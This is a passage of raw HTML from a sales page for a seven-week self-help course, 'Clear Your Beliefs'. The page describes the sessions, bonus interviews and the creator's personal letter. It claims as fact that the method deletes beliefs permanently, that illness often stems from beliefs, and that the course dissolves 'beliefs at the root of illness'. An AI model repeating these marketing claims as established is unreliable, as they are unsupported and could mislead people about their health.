didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" 